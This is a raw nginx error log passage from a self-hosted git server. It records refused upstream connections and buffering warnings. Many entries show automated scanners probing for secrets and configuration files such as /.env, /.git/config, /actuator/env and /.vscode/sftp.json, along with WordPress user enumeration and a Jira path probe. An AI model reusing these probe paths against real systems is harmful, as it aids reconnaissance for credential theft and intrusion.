*3710 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:15 [error] 434#434: *3712 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server-status HTTP/1.1", upstream: "http://192.168.0.250:3000/server-status", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:16 [error] 431#431: *3716 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:17 [error] 435#435: *3718 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /about HTTP/1.1", upstream: "http://192.168.0.250:3000/about", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:17 [error] 433#433: *3720 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:18 [error] 428#428: *3724 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /login.action HTTP/1.1", upstream: "http://192.168.0.250:3000/login.action", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:18 [error] 434#434: *3726 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:19 [error] 428#428: *3728 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/_catalog HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/_catalog", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:19 [error] 428#428: *3731 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:19 [error] 435#435: *3730 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.DS_Store HTTP/1.1", upstream: "http://192.168.0.250:3000/.DS_Store", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:20 [error] 428#428: *3734 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:20 [error] 428#428: *3736 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.env HTTP/1.1", upstream: "http://192.168.0.250:3000/.env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:22 [error] 428#428: *3739 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:22 [error] 428#428: *3738 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", upstream: "http://192.168.0.250:3000/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:24 [error] 428#428: *3743 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:24 [error] 428#428: *3742 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.git/config HTTP/1.1", upstream: "http://192.168.0.250:3000/.git/config", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3747 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3746 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3750 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3752 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3755 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3754 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api HTTP/1.1", upstream: "http://192.168.0.250:3000/api", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:25 [error] 428#428: *3758 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:26 [error] 428#428: *3761 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:26 [error] 428#428: *3760 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/graphql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/graphql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:27 [error] 428#428: *3764 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /graphql/api HTTP/1.1", upstream: "http://192.168.0.250:3000/graphql/api", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:27 [error] 428#428: *3766 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:27 [error] 428#428: *3768 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "POST /api/gql HTTP/1.1", upstream: "http://192.168.0.250:3000/api/gql", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:28 [error] 428#428: *3770 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", upstream: "http://192.168.0.250:3000/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:29 [error] 428#428: *3773 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:29 [error] 428#428: *3772 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /config.json HTTP/1.1", upstream: "http://192.168.0.250:3000/config.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:29 [error] 428#428: *3776 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:30 [error] 428#428: *3778 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:31 [error] 428#428: *3782 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /telescope/requests HTTP/1.1", upstream: "http://192.168.0.250:3000/telescope/requests", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:31 [error] 430#430: *3785 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:31 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:31 [error] 428#428: *3787 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /info.php HTTP/1.1", upstream: "http://192.168.0.250:3000/info.php", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:32 [error] 428#428: *3780 connect() failed (111: Connection refused) while connecting to upstream, client: 95.215.39.14, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:52:32 [error] 428#428: *3791 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.well-known/security.txt HTTP/1.1", upstream: "http://192.168.0.250:3000/.well-known/security.txt", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:33 [error] 430#430: *3793 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:33 [error] 428#428: *3795 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /actuator/env HTTP/1.1", upstream: "http://192.168.0.250:3000/actuator/env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:34 [error] 430#430: *3797 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:35 [error] 430#430: *3799 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:35 [error] 428#428: *3801 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:36 [error] 430#430: *3803 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:36 [error] 430#430: *3805 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:37 [error] 430#430: *3807 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:37 [error] 430#430: *3809 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:38 [error] 430#430: *3811 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:38 [error] 430#430: *3813 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:39 [error] 430#430: *3815 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:39 [error] 430#430: *3817 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:40 [error] 430#430: *3819 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:40 [error] 430#430: *3821 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:41 [error] 430#430: *3823 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:41 [error] 430#430: *3825 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:42 [error] 430#430: *3827 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:42 [error] 430#430: *3830 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:43 [error] 430#430: *3832 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:43 [error] 430#430: *3834 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:44 [error] 430#430: *3836 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:44 [error] 430#430: *3838 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:45 [error] 430#430: *3840 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:45 [error] 430#430: *3842 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:46 [error] 430#430: *3844 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:46 [error] 430#430: *3846 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:47 [error] 430#430: *3848 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:47 [error] 430#430: *3850 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:48 [error] 430#430: *3852 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:49 [error] 430#430: *3854 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr" -2026/02/15 01:53:44 [error] 480#480: *3879 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/" -2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/" -2026/02/15 01:56:08 [error] 506#506: *3954 connect() failed (111: Connection refused) while connecting to upstream, client: 54.86.115.253, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr:443" -2026/02/15 01:56:15 [error] 506#506: *3957 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage.git/info/refs?service=git-upload-pack HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage.git/info/refs?service=git-upload-pack", host: "git.hanmocnn.co.kr" -2026/02/15 01:58:15 [error] 506#506: *3964 connect() failed (111: Connection refused) while connecting to upstream, client: 146.70.185.32, server: git.hanmocnn.co.kr, request: "HEAD / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 02:13:16 [warn] 519#519: *4076 a client request body is buffered to a temporary file /tmp/nginx/body/6/49/0000001496, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" -2026/02/15 03:36:33 [warn] 522#522: *5792 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/24/0000002241 while reading upstream, client: 35.94.224.250, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 03:36:39 [warn] 522#522: *5802 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/24/0000002242 while reading upstream, client: 35.94.224.250, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 03:42:56 [warn] 522#522: *5831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/24/0000002243 while reading upstream, client: 211.234.204.1, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 03:42:56 [warn] 522#522: *5831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/24/0000002244 while reading upstream, client: 211.234.204.1, server: git.hanmocnn.co.kr, request: "GET /assets/js/index-domready.d839c4b7.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index-domready.d839c4b7.js", host: "git.hanmocnn.co.kr" -2026/02/15 04:24:13 [warn] 524#524: *7423 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000002988 while reading upstream, client: 52.16.245.145, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 05:15:45 [warn] 519#519: *7570 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/99/0000002990 while reading upstream, client: 103.4.250.69, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 05:16:57 [warn] 519#519: *7581 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/99/0000002991 while reading upstream, client: 104.253.252.195, server: git.hanmocnn.co.kr, request: "GET /assets/js/index.js?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index.js?v=1.25.3", host: "git.hanmocnn.co.kr" -2026/02/15 05:50:38 [warn] 520#520: *7677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000002999 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /assets/js/swagger.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/swagger.js", host: "git.hanmocnn.co.kr" -2026/02/15 06:12:14 [warn] 531#531: *7719 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000003006 while reading upstream, client: 146.70.185.32, server: git.hanmocnn.co.kr, request: "GET /assets/js/index-domready.d839c4b7.js HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/js/index-domready.d839c4b7.js", host: "git.hanmocnn.co.kr" -2026/02/15 06:46:51 [warn] 701#701: *11294 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/49/0000004493 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 06:47:41 [warn] 715#715: *11321 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/49/0000004494 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.zip", host: "git.hanmocnn.co.kr" -2026/02/15 06:47:51 [warn] 716#716: *11334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/49/0000004495 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/main.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/main.tar.gz", host: "git.hanmocnn.co.kr" -2026/02/15 06:47:51 [warn] 716#716: *11334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/49/0000004496 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f", host: "git.hanmocnn.co.kr" -2026/02/15 06:49:33 [warn] 729#729: *11399 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/49/0000004497 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/main.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/main.bundle", host: "git.hanmocnn.co.kr" -2026/02/15 06:50:14 [warn] 731#731: *11414 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/49/0000004498 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET 